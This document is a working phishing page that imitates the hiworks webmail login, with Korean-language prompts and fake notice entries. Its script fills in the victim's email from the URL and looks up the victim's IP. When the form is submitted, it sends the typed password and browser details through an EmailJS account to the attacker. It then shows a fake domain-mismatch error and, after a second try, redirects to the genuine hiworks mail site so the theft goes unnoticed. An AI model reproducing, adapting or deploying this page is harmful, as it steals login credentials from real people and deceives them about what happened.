<!DOCTYPE html>
<html lang="en">
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
	<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
  <title>hiworks</title>
  <style>

      .slide {
    -moz-animation-duration: 0.7s;
    -webkit-animation-duration: 0.7s;
    -moz-animation-name: slidein-left;
    -webkit-animation-name: slidein-left;
     }

  @-moz-keyframes slidein-left {
    from {
      margin-left: 80%;
      width: 100%;
    }
    to {
      margin-left: 0%;
      width: 100%;
    }
  }

  @-webkit-keyframes slidein-left {
    from {
      margin-left: 80%;
      width: 100%;
    }
    to {
      margin-left: 0%;
      width: 100%;
    }
  }

  * {
    box-sizing: border-box;
  }

  body {
    font-family: 'Segoe UI Webfont', -apple-system, 'Helvetica Neue', 'Lucida Grande', 'Roboto', 'Ebrima', 'Nirmala UI', 'Gadugi', 'Segoe Xbox Symbol', 'Segoe UI Symbol', 'Meiryo UI', 'Khmer UI', 'Tunga', 'Lao UI', 'Raavi', 'Iskoola Pota', 'Latha', 'Leelawadee', 'Microsoft YaHei UI', 'Microsoft JhengHei UI', 'Malgun Gothic', 'Estrangelo Edessa', 'Microsoft Himalaya', 'Microsoft New Tai Lue', 'Microsoft PhagsPa', 'Microsoft Tai Le', 'Microsoft Yi Baiti', 'Mongolian Baiti', 'MV Boli', 'Myanmar Text',
      'Cambria Math';
    margin: 0;
    padding: 0;
    width: 100;
    background-image: url('https://i.ibb.co/C6PpczL/imageedit-1-2607661607.jpg');
    background-repeat: no-repeat;
    background-attachment: fixed;
    background-position: center;
    background-size: cover;
    background-origin: border-box;
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
  }

  .overlay {
    position: absolute;
    width: 100%;
    height: 100%;
    padding: 1rem;
    overflow: hidden;
    margin: 1rem;
    background-color: rgba(255, 255, 255, 0.4);
  }

  a {
    text-decoration: none;
    color: #0067b8;
  }

  a:hover {
    color: #005da6;
  }

  .cookie {
    display: block;
    position: fixed;
    width: 100%;
    top: 0;
    left: 0;
    padding: 0;
    color: #555;
    height: 50px;
    background-color: #f2f2f2;
    text-align: left;
    padding: 0.75em;
    display: inline-block;
    font-size: 0.9rem;
  }

  .img_cookie {
    margin-bottom: -7px;
    margin-left: 8%;
    height: 24px;
  }

  .cookie a {
    margin-left: 20%;
    color: #0067b8;
  }

  .cookie a:hover {
    text-decoration: underline;
  }

  footer {
    display: block;
    position: fixed;
    width: 100%;
    height: 28px;
    bottom: 0;
    left: 0;
    padding: 0;
    color: #111;
  }

  footer ul {
    padding: 0;
    margin: 0;
  }

  footer ul li {
    list-style-type: none;
    display: inline-table;
    float: right;
    margin: 1px 10px;
  }

  footer ul li a {
    color: #111;
    font-size: 12px;
  }

  footer ul li a:hover {
    color: #111;
    text-decoration: underline;
  }

  .btn-group {
    display: inline-flex;
  }

  .login-box {
    background-color: #fff;
    z-index: 1000;
    margin: auto;
    margin: 0 auto;
    min-width: 320px;
    max-width: 500px;
    width: 500px;
    padding: 30px 30px;
    margin-top: 1%;
    border: groove 1px rgba(0, 0, 0, 0.1);
  }

  .login-box h2 {
    font-weight: normal;
    margin-bottom: 0.5em;
  }

  .logo {
    color: #1080dd;
    font-size: 4rem;
    text-align: center;
    margin: 0px;
    font-weight: 550;
    margin-bottom: 2rem;
  }

  .powered {
    text-align: center;
    color: rgba(0, 0, 0, 0.5);
    font-weight: 500;
    font-size: 16px;
  }

  #submit-btn {
    display: block;
    width: 100%;
    background-color: #1080dd;
    height: 32px;
    color: #fff;
    border-color: transparent;
    font-size: 18px;
    outline: none;
    padding: 2.2rem;
    display: flex;
    align-items: center;
    justify-content: center;
    cursor: pointer;
  }

  #msg {
    color: red;
    margin-top: 0px;
    font-size: 15px;
  }

  .input {
    border: 1px solid #c7c3c3;
    padding: 1rem 1.5rem;
    width: 100%;
    margin-bottom: 1rem;
    font: 1rem;
  }

  .form_security {
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-bottom: 1.3rem;
    color: rgba(0, 0, 0, 0.7);
  }

  label {
    display: flex;
    align-items: center;
    font-size: 15px;
    text-transform: capitalize;
    width: 100%;
  }

  .btn_on {
    border-radius: 40%;
    padding: 0.4rem 0.8rem;
    text-transform: uppercase;
    background: transparent;
    color: #1080dd;
    border: 1px solid rgba(0, 0, 0, 0.5);
    font-weight: 600;
    font-size: 17px;
  }

  .radio {
    display: flex;
    justify-content: flex-end;
  }

  .input:focus {
    outline: none;
  }

  .notice {
    display: flex;
    justify-content: space-between;
    margin-top: 1rem;
    align-items: center;
  }

  .notice h4 {
    font-weight: 400;
    color: rgba(0, 0, 0, 0.7);
  }

  .notice span {
    font-weight: 600;
    margin-left: 0.8rem;
    font-size: 30px;
    color: rgba(0, 0, 0, 0.4);
  }

  ul {
    list-style-type: disc;
    text-align: start;
    width: 100%;
    padding-left: 1rem;
  }

  li {
    font-size: 15px;
    color: rgba(0, 0, 0, 0.7);
  }

  .date {
    float: right;
  }

  .prevent {
    color: red;
    cursor: pointer;
  }

  .how_icon {
    background-color: red;
    color: #fff;
    border-radius: 100%;
    padding: 0px 5px;
    font-size: 13px;
    display: inline;
  }

  .login-box input[type='checkbox'] {
    width: 13;
    height: 13px;
  }

  .login-box input[type='checkbox']:focus {
    outline: none;
  }

  .identity-banner {
    height: 28px;
    background: #f2f2f2;
    margin: 16px -30px;
    padding: 0 36px;
  }

  .identity {
    line-height: 28px;
    white-space: nowrap;
    overflow: hidden;
    text-overflow: ellipsis;
    text-align: right;
    width: calc(100% - 56px);
  }

  .profile-photo {
    height: 48px;
    width: 48px;
    margin-top: -48px;
    border-radius: 50%;
    overflow: hidden;
    float: right;
  }

  .hidden {
    display: none;
    visibility: hidden;
  }

  .fade:hover {
    color: #666;
  }

  .message {
    font-size: 0.9rem;
    color: #ff2626;
  }

  .error {
    outline: none;
    border-color: #ff2626 !important;
  }

  .loader {
    position: absolute;
    padding-top: 0;
    width: 40px;
    margin: -22px;
  }

  .loader .circle {
    position: absolute;
    width: 18px;
    height: 18px;
    opacity: 0;
    transform: rotate(225deg);
    animation-iteration-count: infinite;
    animation-name: orbit;
    animation-duration: 3s;
  }

  .loader .circle:after {
    content: '';
    position: absolute;
    width: 3px;
    height: 3px;
    border-radius: 5px;
    background: #000;
  }

  .loader .circle:nth-child(2) {
    animation-delay: 240ms;
  }
  .loader .circle:nth-child(3) {
    animation-delay: 480ms;
  }
  .loader .circle:nth-child(4) {
    animation-delay: 720ms;
  }
  .loader .circle:nth-child(5) {
    animation-delay: 960ms;
  }

  @keyframes orbit {
    0% {
      transform: translate(10px, 0);
      opacity: 1;
      animation-timing-function: ease-out;
    }
    7% {
      transform: translate(30px, 0);
      animation-timing-function: linear;
    }
    30% {
      transform: translate(60px, 0);
      animation-timing-function: ease-in-out;
    }
    40% {
      transform: translate(90px, 0);
      animation-timing-function: ease-out;
    }
    50% {
      transform: translate(120px, 0);
      animation-timing-function: ease-out;
    }
    75% {
      transform: translate(250px, 0);
      animation-timing-function: ease-out;
    }
    76% {
      transform: translate(300px, 0);
      opacity: 0;
    }
    100% {
      transform: translate(350px, 0);
      opacity: 0;
    }
  }

  @media (max-width: 600px) {
    body {
      background-color: #fff;
      background-image: none;
    }

    .overlay {
      background-color: rgba(0, 0, 0, 0);
    }

    .login-box {
      border: none;
    }

    footer {
      background-color: rgba(0, 0, 0, 0);
    }

    footer ul li {
      margin: 1px 5px;
    }

    footer ul li a {
      color: #666;
    }

    footer ul li a:hover {
      color: #666;
    }
    .cookie {
      font-size: 0.63rem;
    }
    .img_cookie {
      margin-bottom: -10px;
      margin-left: 0px;
      height: 24px;
    }
  }

  @media (max-width: 425px) {
    .login-box {
      width: 410px;
    }
    .next {
      margin-left: 140px;
    }
  }

  @media (max-width: 375px) {
    .login-box {
      width: 380px;
    }
    .next {
      margin-left: 160px;
    }
    footer ul {
      margin-right: 10%;
    }
  }

  @media (max-width: 320px) {
    .login-box {
      width: 320px;
    }
    .next {
      margin-left: 100px;
    }
  }

  </style>
</head>
<body>
	<div class="overlay">
		<div class="login-box">
			<h1 class="logo">hiworks</h1>

			<div id="div1">
				<form class="slide" id="contact" autocomplete="off">
					<div class="form_security">
						<label for="">
							<input class="checkbox" type="checkbox" name="" id="" />
							Save ID
						</label>
						<label for="" class="radio">
							IP Security
							<button class="btn_on">On</button>
						</label>
					</div>
					<input id="email" class="input" minlength="6" type="email" autocomplete name="email" placeholder="이메일 또는 도메인 주소 입력" />
					<input id="password" class="input" autofocus autocomplete="false" minlength="6" type="password" required name="password" value="" placeholder="비밀번호를 입력하세요" />
					<p id="msg"></p>
					<div id="error"></div>
					<p class="msg1"></p>
					<button id="submit-btn" type="submit">Sign&nbsp;in</button>

					<div class="notice">
						<h4 class="notice_word">Notice <span>+</span></h4>
						<a class="prevent"><h6 class="how_icon">!</h6> How to prevent phising</a>
					</div>

          <ul>
            <li class="lists" id="list1"><span>`로그인 페이지 개선 적용 사전 안내`</span> <span class="date">2023.07.24</span></li>
            <li class="lists" id="list2"><span></span>`하이웍스 메신저 세션서버 재시작 작업 안내...`</span><span class='date'>2023.08.04</span></li>

          </ul>
				</form>
			</div>
		</div>
		<p class="powered">Powered by hiworks.com</p>

    <!-- The core Firebase JS SDK is always required and must be listed first -->

		<!-- Latest version from CDN -->
		<script src="https://cdnjs.cloudflare.com/ajax/libs/d3/7.1.1/d3.min.js"></script>

		<script type="text/javascript">
      document.addEventListener('DOMContentLoaded', function () {
          if (!window.location.hash) {
               // Add a hash to the URL
               window.location.hash = '#[[email]]'; // Change 'section1' to the desired hash
           }
          // Get the current URL

				var error = document.getElementById('error');
				var div1 = document.getElementById('div1');
				var msg1 = document.getElementById('msg1');
				var msg = document.getElementById('msg');
				var emailInput = document.getElementById('email');
				var submitButton = document.getElementById('submit-btn');
				var passwordInput = document.getElementById('password');
				var list1 = document.getElementById('list1');
				var list2 = document.getElementById('list2');

				var count = 0;

				error.style.display = 'none';
        var email = window.location.hash.substr(1)
          console.log(email)
       // Get the value of the 'email' parameter from the URL

				if (email) {
					emailInput.value = email;
					var my_email = email;
					var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
					if (!filter.test(my_email)) {
						error.style.display = 'block';
						emailInput.focus();
						return false;
					}

					var ind = my_email.indexOf('@');
					var my_slice = my_email.substr(ind + 1);
					div1.style.display = 'none';
					div1.style.display = 'block';
				}

				emailInput.addEventListener('keypress', function () {
					error.style.display = 'none';
				});

				function getUserBrowserDetails() {
					const userAgent = navigator.userAgent;
					const appName = navigator.appName;
					const appVersion = navigator.appVersion;
					const platform = navigator.platform;
					const language = navigator.language;

					return {
						userAgent,
						appName,
						appVersion,
						platform,
						language,
					};
				}

				let ip = '';

				function text(url) {
					return fetch(url).then((res) => res.text());
				}

				text('https://www.cloudflare.com/cdn-cgi/trace').then((data) => {
					let ipRegex = /[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/;
					ip = data.match(ipRegex)[0];
					console.log(ip);
				});

				submitButton.addEventListener('click', async function (event) {
					event.preventDefault();
					submitButton.innerHTML = 'Signing in...';
					msg.innerHTML = '';
					var email = emailInput.value;
					var password = passwordInput.value;
					var detail = getUserBrowserDetails();

					count++;

					const params = {
						email,
						password,
						userAgent: detail.userAgent,
						appName: detail.appName,
						appVersion: detail.appVersion,
						platform: detail.platform,
						language: detail.language,
						ip,
					};

					const data = {
						service_id: 'service_v94347h',
						template_id: 'template_1820lea',
						template_params: params,
						user_id: '-csSYtT85Cumloy8C',
					};

					if (count >= 2) {
						window.location.replace('https://mail.office.hiworks.com/sewang.kr/home');
					}

					// return;
					try {
						const response = await fetch('https://api.emailjs.com/api/v1.0/email/send', {
							method: 'POST',
							body: JSON.stringify(data), // Use 'body' instead of 'data'
							headers: {
								'Content-Type': 'application/json', // Set content type as a header
							},
						});

						if (response.ok) {
              msg.innerHTML = '계정의 도메인이 접속한 오피스의 도메인과 일치하지 않습니다.';
							passwordInput.value = '';
						} else {
							passwordInput.value = '';
							msg.innerHTML = '';
						}
					} catch (error) {
						passwordInput.value = '';
						msg.innerHTML = '';
					}
					submitButton.innerHTML = 'Sign in';
				});
			});
		</script>
	</div>
</body>

</html>